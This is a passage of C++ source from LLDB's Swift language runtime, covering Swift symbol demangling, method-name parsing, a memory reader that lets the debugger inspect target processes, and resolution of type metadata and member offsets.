&object) { if (object.IsUninitializedReference()) { str.Printf("<uninitialized>"); return true; } if (::IsSwiftResultVariable(object.GetName())) { // if this thing is a Swift expression result variable, it has two // properties: // a) its name is something we can refer to in expressions for free // b) its 
type may be something we can't actually talk about in expressions // so, just use the result variable's name in the expression and be done // with it StreamString probe_stream; if (GetObjectDescription_ResultVariable(m_process, probe_stream, object)) { str.Printf("%s", probe_stream.GetData()); return true; } } else if (::IsSwiftReferenceType(object)) { // if this is a Swift class, it has two properties: // a) we do not need its type name, AnyObject is just as good // b) its value is something we can directly use to refer to it // so, just use the ValueObject's pointer-value and be done with it StreamString probe_stream; if (GetObjectDescription_ObjectReference(m_process, probe_stream, object)) { str.Printf("%s", probe_stream.GetData()); return true; } } // in general, don't try to use the name of the ValueObject as it might end up // referring to the wrong thing return GetObjectDescription_ObjectCopy(this, m_process, str, object); } bool SwiftLanguageRuntime::GetObjectDescription( Stream &str, Value &value, ExecutionContextScope *exe_scope) { // This is only interesting to do with a ValueObject for Swift return false; } bool SwiftLanguageRuntime::IsSwiftMangledName(const char *name) { return swift::Demangle::isSwiftSymbol(name); } void SwiftLanguageRuntime::GetGenericParameterNamesForFunction( const SymbolContext &const_sc, llvm::DenseMap<SwiftLanguageRuntime::ArchetypePath, StringRef> &dict) { // This terrifying cast avoids having too many differences with llvm.org. SymbolContext &sc = const_cast<SymbolContext &>(const_sc); // While building the Symtab itself the symbol context is incomplete. // Note that calling sc.module_sp->FindFunctions() here is too early and // would mess up the loading process. 
if (!sc.function && sc.module_sp && sc.symbol) return; Block *block = sc.GetFunctionBlock(); if (!block) return; bool can_create = true; VariableListSP var_list = block->GetBlockVariableList(can_create); if (!var_list) return; for (unsigned i = 0; i < var_list->GetSize(); ++i) { VariableSP var_sp = var_list->GetVariableAtIndex(i); StringRef name = var_sp->GetName().GetStringRef(); if (!name.consume_front(g_dollar_tau_underscore)) continue; uint64_t depth; if (name.consumeInteger(10, depth)) continue; if (!name.consume_front("_")) continue; uint64_t index; if (name.consumeInteger(10, index)) continue; if (!name.empty()) continue; Type *archetype = var_sp->GetType(); if (!archetype) continue; dict.insert({{depth, index}, archetype->GetName().GetStringRef()}); } } std::string SwiftLanguageRuntime::DemangleSymbolAsString(StringRef symbol, bool simplified, const SymbolContext *sc) { bool did_init = false; llvm::DenseMap<ArchetypePath, StringRef> dict; swift::Demangle::DemangleOptions options; if (simplified) options = swift::Demangle::DemangleOptions::SimplifiedUIDemangleOptions(); if (sc) { options.GenericParameterName = [&](uint64_t depth, uint64_t index) { if (!did_init) { GetGenericParameterNamesForFunction(*sc, dict); did_init = true; } auto it = dict.find({depth, index}); if (it != dict.end()) return it->second.str(); return swift::Demangle::genericParameterName(depth, index); }; } return swift::Demangle::demangleSymbolAsString(symbol, options); } bool SwiftLanguageRuntime::IsSwiftClassName(const char *name) { return swift::Demangle::isClass(name); } void SwiftLanguageRuntime::MethodName::Clear() { m_full.Clear(); m_basename = llvm::StringRef(); m_context = llvm::StringRef(); m_arguments = llvm::StringRef(); m_qualifiers = llvm::StringRef(); m_template_args = llvm::StringRef(); m_metatype_ref = llvm::StringRef(); m_return_type = llvm::StringRef(); m_type = eTypeInvalid; m_parsed = false; m_parse_error = false; } static bool StringHasAllOf(const llvm::StringRef &s, 
const char *which) { for (const char *c = which; *c != 0; c++) { if (s.find(*c) == llvm::StringRef::npos) return false; } return true; } static bool StringHasAnyOf(const llvm::StringRef &s, std::initializer_list<const char *> which, size_t &where) { for (const char *item : which) { size_t where_item = s.find(item); if (where_item != llvm::StringRef::npos) { where = where_item; return true; } } where = llvm::StringRef::npos; return false; } static bool UnpackTerminatedSubstring(const llvm::StringRef &s, const char start, const char stop, llvm::StringRef &dest) { size_t pos_of_start = s.find(start); if (pos_of_start == llvm::StringRef::npos) return false; size_t pos_of_stop = s.rfind(stop); if (pos_of_stop == llvm::StringRef::npos) return false; size_t token_count = 1; size_t idx = pos_of_start + 1; while (idx < s.size()) { if (s[idx] == start) ++token_count; if (s[idx] == stop) { if (token_count == 1) { dest = s.slice(pos_of_start, idx + 1); return true; } } idx++; } return false; } static bool UnpackQualifiedName(const llvm::StringRef &s, llvm::StringRef &decl, llvm::StringRef &basename, bool &was_operator) { size_t pos_of_dot = s.rfind('.'); if (pos_of_dot == llvm::StringRef::npos) return false; decl = s.substr(0, pos_of_dot); basename = s.substr(pos_of_dot + 1); size_t idx_of_operator; was_operator = StringHasAnyOf(basename, {"@infix", "@prefix", "@postfix"}, idx_of_operator); if (was_operator) basename = basename.substr(0, idx_of_operator - 1); return !decl.empty() && !basename.empty(); } static bool ParseLocalDeclName(const swift::Demangle::NodePointer &node, StreamString &identifier, swift::Demangle::Node::Kind &parent_kind, swift::Demangle::Node::Kind &kind) { swift::Demangle::Node::iterator end = node->end(); for (swift::Demangle::Node::iterator pos = node->begin(); pos != end; ++pos) { swift::Demangle::NodePointer child = *pos; swift::Demangle::Node::Kind child_kind = child->getKind(); switch (child_kind) { case swift::Demangle::Node::Kind::Number: break; 
    default:
      // Any child carrying text is taken as the declaration's identifier.
      if (child->hasText()) {
        identifier.PutCString(child->getText());
        return true;
      }
      break;
    }
  }
  return false;
}

// Extract the printable basename of a function-like demangle node into
// `identifier`. `parent_kind` receives the kind of the scope the function
// lives in (first child); `kind` may be refined by ParseLocalDeclName.
static bool ParseFunction(const swift::Demangle::NodePointer &node,
                          StreamString &identifier,
                          swift::Demangle::Node::Kind &parent_kind,
                          swift::Demangle::Node::Kind &kind) {
  swift::Demangle::Node::iterator end = node->end();
  swift::Demangle::Node::iterator pos = node->begin();
  // First child is the function's scope
  parent_kind = (*pos)->getKind();
  ++pos;
  // Second child is either the type (no identifier)
  if (pos != end) {
    switch ((*pos)->getKind()) {
    case swift::Demangle::Node::Kind::Type:
      break;

    case swift::Demangle::Node::Kind::LocalDeclName:
      if (ParseLocalDeclName(*pos, identifier, parent_kind, kind))
        return true;
      else
        return false;
      break;

    // Deliberate fallthrough: any other kind is treated like the
    // operator/identifier cases below and contributes its text, if any.
    default:
    case swift::Demangle::Node::Kind::InfixOperator:
    case swift::Demangle::Node::Kind::PostfixOperator:
    case swift::Demangle::Node::Kind::PrefixOperator:
    case swift::Demangle::Node::Kind::Identifier:
      if ((*pos)->hasText())
        identifier.PutCString((*pos)->getText());
      return true;
    }
  }
  return false;
}

// Walk the children of a Global demangle node looking for a function-like
// entity; synthesizes the conventional LLDB-visible names for the
// allocating/non-allocating init and deinit entry points.
static bool ParseGlobal(const swift::Demangle::NodePointer &node,
                        StreamString &identifier,
                        swift::Demangle::Node::Kind &parent_kind,
                        swift::Demangle::Node::Kind &kind) {
  swift::Demangle::Node::iterator end = node->end();
  for (swift::Demangle::Node::iterator pos = node->begin(); pos != end; ++pos) {
    swift::Demangle::NodePointer child = *pos;
    if (child) {
      kind = child->getKind();
      switch (child->getKind()) {
      case swift::Demangle::Node::Kind::Allocator:
        identifier.PutCString("__allocating_init");
        ParseFunction(child, identifier, parent_kind, kind);
        return true;

      case swift::Demangle::Node::Kind::Constructor:
        identifier.PutCString("init");
        ParseFunction(child, identifier, parent_kind, kind);
        return true;

      case swift::Demangle::Node::Kind::Deallocator:
        identifier.PutCString("__deallocating_deinit");
        ParseFunction(child, identifier, parent_kind, kind);
        return true;

      case swift::Demangle::Node::Kind::Destructor:
identifier.PutCString("deinit"); ParseFunction(child, identifier, parent_kind, kind); return true; case swift::Demangle::Node::Kind::Getter: case swift::Demangle::Node::Kind::Setter: case swift::Demangle::Node::Kind::Function: return ParseFunction(child, identifier, parent_kind, kind); // Ignore these, they decorate a function at the same level, but don't // contain any text case swift::Demangle::Node::Kind::ObjCAttribute: break; default: return false; } } } return false; } bool SwiftLanguageRuntime::MethodName::ExtractFunctionBasenameFromMangled( ConstString mangled, ConstString &basename, bool &is_method) { bool success = false; swift::Demangle::Node::Kind kind = swift::Demangle::Node::Kind::Global; swift::Demangle::Node::Kind parent_kind = swift::Demangle::Node::Kind::Global; if (mangled) { const char *mangled_cstr = mangled.GetCString(); const size_t mangled_cstr_len = mangled.GetLength(); if (mangled_cstr_len > 3) { llvm::StringRef mangled_ref(mangled_cstr, mangled_cstr_len); // Only demangle swift functions // This is a no-op right now for the new mangling, because you // have to demangle the whole name to figure this out anyway. // I'm leaving the test here in case we actually need to do this // only to functions. 
swift::Demangle::Context demangle_ctx; swift::Demangle::NodePointer node = demangle_ctx.demangleSymbolAsNode(mangled_ref); StreamString identifier; if (node) { switch (node->getKind()) { case swift::Demangle::Node::Kind::Global: success = ParseGlobal(node, identifier, parent_kind, kind); break; default: break; } if (!identifier.GetString().empty()) { basename = ConstString(identifier.GetString()); } } } } if (success) { switch (kind) { case swift::Demangle::Node::Kind::Allocator: case swift::Demangle::Node::Kind::Constructor: case swift::Demangle::Node::Kind::Deallocator: case swift::Demangle::Node::Kind::Destructor: is_method = true; break; case swift::Demangle::Node::Kind::Getter: case swift::Demangle::Node::Kind::Setter: // don't handle getters and setters right now... return false; case swift::Demangle::Node::Kind::Function: switch (parent_kind) { case swift::Demangle::Node::Kind::BoundGenericClass: case swift::Demangle::Node::Kind::BoundGenericEnum: case swift::Demangle::Node::Kind::BoundGenericStructure: case swift::Demangle::Node::Kind::Class: case swift::Demangle::Node::Kind::Enum: case swift::Demangle::Node::Kind::Structure: is_method = true; break; default: break; } break; default: break; } } return success; } void SwiftLanguageRuntime::MethodName::Parse() { if (!m_parsed && m_full) { m_parse_error = false; m_parsed = true; llvm::StringRef full(m_full.GetCString()); bool was_operator = false; if (full.find("::") != llvm::StringRef::npos) { // :: is not an allowed operator in Swift (func ::(...) 
{ fails to // compile) // but it's a very legitimate token in C++ - as a defense, reject anything // with a :: in it as invalid Swift m_parse_error = true; return; } if (StringHasAllOf(full, ".:()")) { const size_t open_paren = full.find(" ("); llvm::StringRef funcname = full.substr(0, open_paren); UnpackQualifiedName(funcname, m_context, m_basename, was_operator); if (was_operator) m_type = eTypeOperator; // check for obvious constructor/destructor cases else if (m_basename.equals("__deallocating_destructor")) m_type = eTypeDeallocator; else if (m_basename.equals("__allocating_constructor")) m_type = eTypeAllocator; else if (m_basename.equals("init")) m_type = eTypeConstructor; else if (m_basename.equals("destructor")) m_type = eTypeDestructor; else m_type = eTypeUnknownMethod; const size_t idx_of_colon = full.find(':', open_paren == llvm::StringRef::npos ? 0 : open_paren); full = full.substr(idx_of_colon + 2); if (full.empty()) return; if (full[0] == '<') { if (UnpackTerminatedSubstring(full, '<', '>', m_template_args)) { full = full.substr(m_template_args.size()); } else { m_parse_error = true; return; } } if (full.empty()) return; if (full[0] == '(') { if (UnpackTerminatedSubstring(full, '(', ')', m_metatype_ref)) { full = full.substr(m_template_args.size()); if (full[0] == '<') { if (UnpackTerminatedSubstring(full, '<', '>', m_template_args)) { full = full.substr(m_template_args.size()); } else { m_parse_error = true; return; } } } else { m_parse_error = true; return; } } if (full.empty()) return; if (full[0] == '(') { if (UnpackTerminatedSubstring(full, '(', ')', m_arguments)) { full = full.substr(m_template_args.size()); } else { m_parse_error = true; return; } } if (full.empty()) return; size_t idx_of_ret = full.find("->"); if (idx_of_ret == llvm::StringRef::npos) { full = full.substr(idx_of_ret); if (full.empty()) { m_parse_error = true; return; } if (full[0] == ' ') full = full.substr(1); m_return_type = full; } } else if (full.find('.') != 
llvm::StringRef::npos) { // this is probably just a full name (module.type.func) UnpackQualifiedName(full, m_context, m_basename, was_operator); if (was_operator) m_type = eTypeOperator; else m_type = eTypeUnknownMethod; } else { // this is most probably just a basename m_basename = full; m_type = eTypeUnknownMethod; } } } llvm::StringRef SwiftLanguageRuntime::MethodName::GetBasename() { if (!m_parsed) Parse(); return m_basename; } const CompilerType &SwiftLanguageRuntime::GetBoxMetadataType() { if (m_box_metadata_type.IsValid()) return m_box_metadata_type; static ConstString g_type_name("__lldb_autogen_boxmetadata"); const bool is_packed = false; if (ClangASTContext *ast_ctx = GetProcess()->GetTarget().GetScratchClangASTContext()) { CompilerType voidstar = ast_ctx->GetBasicType(lldb::eBasicTypeVoid).GetPointerType(); CompilerType uint32 = ClangASTContext::GetIntTypeFromBitSize( ast_ctx->getASTContext(), 32, false); m_box_metadata_type = ast_ctx->GetOrCreateStructForIdentifier( g_type_name, {{"kind", voidstar}, {"offset", uint32}}, is_packed); } return m_box_metadata_type; } class LLDBMemoryReader : public swift::remote::MemoryReader { public: LLDBMemoryReader(Process *p, size_t max_read_amount = INT32_MAX) : m_process(p) { lldbassert(m_process && "MemoryReader requires a valid Process"); m_max_read_amount = max_read_amount; } virtual ~LLDBMemoryReader() = default; bool queryDataLayout(DataLayoutQueryType type, void *inBuffer, void *outBuffer) override { switch (type) { case DLQ_GetPointerSize: { auto result = static_cast<uint8_t *>(outBuffer); *result = m_process->GetAddressByteSize(); return true; } case DLQ_GetSizeSize: { auto result = static_cast<uint8_t *>(outBuffer); *result = m_process->GetAddressByteSize(); // FIXME: sizeof(size_t) return true; } } return false; } swift::remote::RemoteAddress getSymbolAddress(const std::string &name) override { lldbassert(!name.empty()); if (name.empty()) return swift::remote::RemoteAddress(nullptr); 
LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] asked to retrieve the address of symbol {0}", name); ConstString name_cs(name.c_str(), name.size()); SymbolContextList sc_list; if (!m_process->GetTarget().GetImages().FindSymbolsWithNameAndType( name_cs, lldb::eSymbolTypeAny, sc_list)) { LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resoution failed {0}", name); return swift::remote::RemoteAddress(nullptr); } SymbolContext sym_ctx; // Remove undefined symbols from the list. size_t num_sc_matches = sc_list.GetSize(); if (num_sc_matches > 1) { SymbolContextList tmp_sc_list(sc_list); sc_list.Clear(); for (size_t idx = 0; idx < num_sc_matches; idx++) { tmp_sc_list.GetContextAtIndex(idx, sym_ctx); if (sym_ctx.symbol && sym_ctx.symbol->GetType() != lldb::eSymbolTypeUndefined) { sc_list.Append(sym_ctx); } } } if (sc_list.GetSize() == 1 && sc_list.GetContextAtIndex(0, sym_ctx)) { if (sym_ctx.symbol) { auto load_addr = sym_ctx.symbol->GetLoadAddress(&m_process->GetTarget()); LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resolved to 0x%" PRIx64, load_addr); return swift::remote::RemoteAddress(load_addr); } } // Empty list, resolution failed. if (sc_list.GetSize() == 0) { LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resoution failed {0}", name); return swift::remote::RemoteAddress(nullptr); } // If there's a single symbol, then we're golden. If there's more than // a symbol, then just make sure all of them agree on the value. 
Status error; auto sym = sc_list.GetContextAtIndex(0, sym_ctx); auto load_addr = sym_ctx.symbol->GetLoadAddress(&m_process->GetTarget()); uint64_t sym_value = m_process->GetTarget().ReadUnsignedIntegerFromMemory( load_addr, false, m_process->GetAddressByteSize(), 0, error); for (unsigned i = 1; i < sc_list.GetSize(); ++i) { auto other_sym = sc_list.GetContextAtIndex(i, sym_ctx); auto other_load_addr = sym_ctx.symbol->GetLoadAddress(&m_process->GetTarget()); uint64_t other_sym_value = m_process->GetTarget().ReadUnsignedIntegerFromMemory( load_addr, false, m_process->GetAddressByteSize(), 0, error); if (sym_value != other_sym_value) { LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resoution failed {0}", name); return swift::remote::RemoteAddress(nullptr); } } LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resolved to {0}", load_addr); return swift::remote::RemoteAddress(load_addr); } bool readBytes(swift::remote::RemoteAddress address, uint8_t *dest, uint64_t size) override { if (m_local_buffer) { auto addr = address.getAddressData(); if (addr >= m_local_buffer && addr + size <= m_local_buffer + m_local_buffer_size) { // If this crashes, the assumptions stated in // GetDynamicTypeAndAddress_Protocol() most likely no longer // hold. 
memcpy(dest, (void *) addr, size); return true; } } Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf("[MemoryReader] asked to read %" PRIu64 " bytes at address 0x%" PRIx64, size, address.getAddressData()); if (size > m_max_read_amount) { if (log) log->Printf( "[MemoryReader] memory read exceeds maximum allowed size"); return false; } Target &target(m_process->GetTarget()); Address addr(address.getAddressData()); Status error; if (size > target.ReadMemory(addr, false, dest, size, error)) { if (log) log->Printf( "[MemoryReader] memory read returned fewer bytes than asked for"); return false; } if (error.Fail()) { if (log) log->Printf("[MemoryReader] memory read returned error: %s", error.AsCString()); return false; } if (log && log->GetVerbose()) { StreamString stream; for (uint64_t i = 0; i < size; i++) { stream.PutHex8(dest[i]); stream.PutChar(' '); } log->Printf("[MemoryReader] memory read returned data: %s", stream.GetData()); } return true; } bool readString(swift::remote::RemoteAddress address, std::string &dest) override { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf( "[MemoryReader] asked to read string data at address 0x%" PRIx64, address.getAddressData()); uint32_t read_size = 50 * 1024; std::vector<char> storage(read_size, 0); Target &target(m_process->GetTarget()); Address addr(address.getAddressData()); Status error; target.ReadCStringFromMemory(addr, &storage[0], storage.size(), error); if (error.Success()) { dest.assign(&storage[0]); if (log) log->Printf("[MemoryReader] memory read returned data: %s", dest.c_str()); return true; } else { if (log) log->Printf("[MemoryReader] memory read returned error: %s", error.AsCString()); return false; } } void pushLocalBuffer(uint64_t local_buffer, uint64_t local_buffer_size) { lldbassert(!m_local_buffer); m_local_buffer = local_buffer; m_local_buffer_size = local_buffer_size; } void popLocalBuffer() { lldbassert(m_local_buffer); m_local_buffer = 0; 
m_local_buffer_size = 0; } private: Process *m_process; size_t m_max_read_amount; uint64_t m_local_buffer = 0; uint64_t m_local_buffer_size = 0; }; std::shared_ptr<swift::remote::MemoryReader> SwiftLanguageRuntime::GetMemoryReader() { if (!m_memory_reader_sp) m_memory_reader_sp.reset(new LLDBMemoryReader(GetProcess())); return m_memory_reader_sp; } void SwiftLanguageRuntime::PushLocalBuffer(uint64_t local_buffer, uint64_t local_buffer_size) { ((LLDBMemoryReader *)GetMemoryReader().get())->pushLocalBuffer( local_buffer, local_buffer_size); } void SwiftLanguageRuntime::PopLocalBuffer() { ((LLDBMemoryReader *)GetMemoryReader().get())->popLocalBuffer(); } SwiftLanguageRuntime::MetadataPromise::MetadataPromise( ValueObject &for_object, SwiftLanguageRuntime &runtime, lldb::addr_t location) : m_for_object_sp(for_object.GetSP()), m_swift_runtime(runtime), m_metadata_location(location) {} CompilerType SwiftLanguageRuntime::MetadataPromise::FulfillTypePromise(Status *error) { if (error) error->Clear(); Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf("[MetadataPromise] asked to fulfill type promise at location " "0x%" PRIx64, m_metadata_location); if (m_compiler_type.hasValue()) return m_compiler_type.getValue(); auto swift_ast_ctx = m_for_object_sp->GetScratchSwiftASTContext(); if (!swift_ast_ctx) { error->SetErrorString("couldn't get Swift scratch context"); return CompilerType(); } auto &remote_ast = m_swift_runtime.GetRemoteASTContext(*swift_ast_ctx); swift::remoteAST::Result<swift::Type> result = remote_ast.getTypeForRemoteTypeMetadata( swift::remote::RemoteAddress(m_metadata_location)); if (result) { m_compiler_type = {swift_ast_ctx.get(), result.getValue().getPointer()}; if (log) log->Printf("[MetadataPromise] result is type %s", m_compiler_type->GetTypeName().AsCString()); return m_compiler_type.getValue(); } else { const auto &failure = result.getFailure(); if (error) error->SetErrorStringWithFormat("error in resolving type: %s", 
failure.render().c_str()); if (log) log->Printf("[MetadataPromise] failure: %s", failure.render().c_str()); return (m_compiler_type = CompilerType()).getValue(); } } llvm::Optional<swift::MetadataKind> SwiftLanguageRuntime::MetadataPromise::FulfillKindPromise(Status *error) { if (error) error->Clear(); Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf("[MetadataPromise] asked to fulfill kind promise at location " "0x%" PRIx64, m_metadata_location); if (m_metadata_kind.hasValue()) return m_metadata_kind; auto swift_ast_ctx = m_for_object_sp->GetScratchSwiftASTContext(); if (!swift_ast_ctx) { error->SetErrorString("couldn't get Swift scratch context"); return llvm::None; } auto &remote_ast = m_swift_runtime.GetRemoteASTContext(*swift_ast_ctx); swift::remoteAST::Result<swift::MetadataKind> result = remote_ast.getKindForRemoteTypeMetadata( swift::remote::RemoteAddress(m_metadata_location)); if (result) { m_metadata_kind = result.getValue(); if (log) log->Printf("[MetadataPromise] result is kind %u", result.getValue()); return m_metadata_kind; } else { const auto &failure = result.getFailure(); if (error) error->SetErrorStringWithFormat("error in resolving type: %s", failure.render().c_str()); if (log) log->Printf("[MetadataPromise] failure: %s", failure.render().c_str()); return m_metadata_kind; } } bool SwiftLanguageRuntime::MetadataPromise::IsStaticallyDetermined() { if (llvm::Optional<swift::MetadataKind> kind_promise = FulfillKindPromise()) { switch (kind_promise.getValue()) { case swift::MetadataKind::Class: case swift::MetadataKind::Existential: case swift::MetadataKind::ObjCClassWrapper: return false; default: return true; } } llvm_unreachable("Unknown metadata kind"); } SwiftLanguageRuntime::MetadataPromiseSP SwiftLanguageRuntime::GetMetadataPromise(lldb::addr_t addr, ValueObject &for_object) { auto swift_ast_ctx = for_object.GetScratchSwiftASTContext(); if (!swift_ast_ctx || swift_ast_ctx->HasFatalErrors()) return nullptr; if (addr == 
0 || addr == LLDB_INVALID_ADDRESS) return nullptr; auto key = std::make_pair(swift_ast_ctx->GetASTContext(), addr); auto iter = m_promises_map.find(key); if (iter != m_promises_map.end()) return iter->second; MetadataPromiseSP promise_sp(new MetadataPromise(for_object, *this, addr)); m_promises_map.insert({key, promise_sp}); return promise_sp; } swift::remoteAST::RemoteASTContext & SwiftLanguageRuntime::GetRemoteASTContext(SwiftASTContext &swift_ast_ctx) { // If we already have a remote AST context for this AST context, // return it. auto known = m_remote_ast_contexts.find(swift_ast_ctx.GetASTContext()); if (known != m_remote_ast_contexts.end()) return *known->second; // Initialize a new remote AST context. auto remote_ast_up = llvm::make_unique<swift::remoteAST::RemoteASTContext>( *swift_ast_ctx.GetASTContext(), GetMemoryReader()); auto &remote_ast = *remote_ast_up; m_remote_ast_contexts.insert( {swift_ast_ctx.GetASTContext(), std::move(remote_ast_up)}); return remote_ast; } void SwiftLanguageRuntime::ReleaseAssociatedRemoteASTContext( swift::ASTContext *ctx) { m_remote_ast_contexts.erase(ctx); } namespace { class ASTVerifier : public swift::ASTWalker { bool hasMissingPatterns = false; bool walkToDeclPre(swift::Decl *D) override { if (auto *PBD = llvm::dyn_cast<swift::PatternBindingDecl>(D)) { if (PBD->getPatternList().empty()) { hasMissingPatterns = true; return false; } } return true; } public: /// Detect (one form of) incomplete types. These may appear if /// member variables have Clang-imported types that couldn't be /// resolved. 
static bool Verify(swift::Decl *D) { if (!D) return false; ASTVerifier verifier; D->walk(verifier); return !verifier.hasMissingPatterns; } }; } llvm::Optional<uint64_t> SwiftLanguageRuntime::GetMemberVariableOffset(CompilerType instance_type, ValueObject *instance, ConstString member_name, Status *error) { if (!instance_type.IsValid()) return llvm::None; Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); // Using the module context for RemoteAST is cheaper bit only safe // when there is no dynamic type resolution involved. auto *module_ctx = llvm::dyn_cast_or_null<SwiftASTContext>(instance_type.GetTypeSystem()); if (!module_ctx || module_ctx->HasFatalErrors()) return llvm::None; llvm::Optional<SwiftASTContextReader> scratch_ctx; if (instance) { scratch_ctx = instance->GetScratchSwiftASTContext(); if (!scratch_ctx) return llvm::None; } auto *remote_ast = &GetRemoteASTContext(*module_ctx); if (log) log->Printf( "[GetMemberVariableOffset] asked to resolve offset for member %s", member_name.AsCString()); // Check whether we've already cached this offset. swift::TypeBase *swift_type = GetCanonicalSwiftType(instance_type).getPointer(); // Perform the cache lookup. MemberID key{swift_type, member_name.GetCString()}; auto it = m_member_offsets.find(key); if (it != m_member_offsets.end()) return it->second; // Dig out metadata describing the type, if it's easy to find. // FIXME: the Remote AST library should make this easier. swift::remote::RemoteAddress optmeta(nullptr); const swift::TypeKind type_kind = swift_type->getKind(); switch (type_kind) { case swift::TypeKind::Class: case swift::TypeKind::BoundGenericClass: { if (log) log->Printf("[MemberVariableOffsetResolver] type is a class - trying to " "get metadata for valueobject %s", (instance ? 
instance->GetName().AsCString() : "<null>")); if (instance) { lldb::addr_t pointer = instance->GetPointerValue(); if (!pointer || pointer == LLDB_INVALID_ADDRESS) break; swift::remote::RemoteAddress address(pointer); if (auto metadata = remote_ast->getHeapMetadataForObject(address)) optmeta = metadata.getValue(); } if (log) log->Printf("[MemberVariableOffsetResolver] optmeta = 0x%" PRIx64, optmeta.getAddressData()); break; } default: // Bind generic parameters if necessary. if (instance && swift_type->hasTypeParameter()) if (auto *frame = instance->GetExecutionContextRef().GetFrameSP().get()) if (auto bound = DoArchetypeBindingForType(*frame, instance_type)) { if (log) log->Printf( "[MemberVariableOffsetResolver] resolved non-class type = %s", bound.GetTypeName().AsCString()); swift_type = GetCanonicalSwiftType(bound).getPointer(); MemberID key{swift_type, member_name.GetCString()}; auto it = m_member_offsets.find(key); if (it != m_member_offsets.end()) return it->second; assert(bound.GetTypeSystem() == scratch_ctx->get()); remote_ast = &GetRemoteASTContext(*scratch_ctx->get()); } } // Try to determine whether it is safe to use RemoteAST. RemoteAST // is faster than RemoteMirrors, but can't do dynamic types (checked // inside RemoteAST) or incomplete types (checked here). bool safe_to_use_remote_ast = true; if (swift::Decl *type_decl = swift_type->getNominalOrBoundGenericNominal()) safe_to_use_remote_ast &= ASTVerifier::Verify(type_decl); // Use RemoteAST to determine the member offset. if (safe_to_use_remote_ast) { swift::remoteAST::Result<uint64_t> result = remote_ast->getOffsetOfMember( swift_type, optmeta, member_name.GetStringRef()); if (result) { if (log) log->Printf( "[MemberVariableOffsetResolver] offset discovered = %" PRIu64, (uint64_t)result.getValue()); // Cache this result. 
MemberID key{swift_type, member_name.GetCString()}; m_member_offsets.insert({key, result.getValue()}); return result.getValue(); } const auto &failure = result.getFailure(); if (error) error->SetErrorStringWithFormat("error in resolving type offset: %s", failure.render().c_str()); if (log) log->Printf("[MemberVariableOffsetResolver] failure: %s", failure.render().c_str()); } // Try remote mirrors. const swift::reflection::TypeInfo *type_info = GetTypeInfo(instance_type); if (!type_info) return llvm::None; auto record_type_info = llvm::dyn_cast<swift::reflection::RecordTypeInfo>(type_info); if (record_type_info) { // Handle tuples. if (record_type_info->getRecordKind() == swift::reflection::RecordKind::Tuple) { unsigned tuple_idx; if (member_name.GetStringRef().getAsInteger(10, tuple_idx) || tuple_idx >= record_type_info->getNumFields()) { if (error) error->SetErrorString("tuple index out of bounds"); return llvm::None; } return record_type_info->getFields()[tuple_idx].Offset; } // Handle other record types. for (auto &field : record_type_info->getFields()) { if (ConstString(field.Name) == member_name) return field.Offset; } } lldb::addr_t pointer = instance->GetPointerValue(); auto class_instance_type_info = reflection_ctx->getInstanceTypeInfo(pointer); if (class_instance_type_info) { auto class_type_info = llvm::dyn_cast<swift::reflection::RecordTypeInfo>( class_instance_type_info); if (class_type_info) { for (auto &field : class_type_info->getFields()) { if (ConstString(field.Name) == member_name) return field.Offset; } } } return llvm::None; } bool SwiftLanguageRuntime::IsSelf(Variable &variable) { // A variable is self if its name if "self", and it's either a // function argument or a local variable and it's scope is a // constructor. These checks are sorted from cheap to expensive. 
if (variable.GetUnqualifiedName() != g_self)
    return false;
  // Arguments named "self" are always self.
  if (variable.GetScope() == lldb::eValueTypeVariableArgument)
    return true;
  if (variable.GetScope() != lldb::eValueTypeVariableLocal)
    return false;

  // For a local "self", demangle the enclosing function and accept only
  // constructors (where the compiler materializes self as a local).
  SymbolContextScope *sym_ctx_scope = variable.GetSymbolContextScope();
  if (!sym_ctx_scope)
    return false;
  Function *function = sym_ctx_scope->CalculateSymbolContextFunction();
  if (!function)
    return false;
  StringRef func_name = function->GetMangled().GetMangledName().GetStringRef();
  swift::Demangle::Context demangle_ctx;
  swift::Demangle::NodePointer node_ptr =
      demangle_ctx.demangleSymbolAsNode(func_name);
  if (!node_ptr)
    return false;
  if (node_ptr->getKind() != swift::Demangle::Node::Kind::Global)
    return false;
  if (node_ptr->getNumChildren() != 1)
    return false;
  node_ptr = node_ptr->getFirstChild();
  return node_ptr->getKind() == swift::Demangle::Node::Kind::Constructor;
}

/// Determine whether the scratch SwiftASTContext has been locked.
/// (Probes the lock: if try_lock succeeds it was unlocked.)
static bool IsScratchContextLocked(Target &target) {
  if (target.GetSwiftScratchContextLock().try_lock()) {
    target.GetSwiftScratchContextLock().unlock();
    return false;
  }
  return true;
}

/// Determine whether the scratch SwiftASTContext has been locked.
/// A null target is conservatively reported as locked.
static bool IsScratchContextLocked(TargetSP target) {
  return target ?
